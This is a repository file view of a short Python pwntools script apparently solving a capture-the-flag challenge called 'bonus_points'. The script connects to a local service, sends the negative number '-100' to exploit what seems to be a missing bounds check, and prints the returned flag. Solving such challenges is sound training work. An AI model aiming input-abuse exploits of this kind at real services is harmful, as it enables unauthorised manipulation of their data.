Files
ctf/hackerpole/pwn/bonus_points/exploit.py
2023-12-25 07:06:20 +01:00

7 lines
179 B
Python

from pwn import remote, log
with remote("localhost", 4000, fam="ipv4") as p:
p.recvuntil(b"?\n")
p.sendline(b"-100")
log.info(p.recvregex("FCSC\{[0-9a-fA-F]{64}\}"))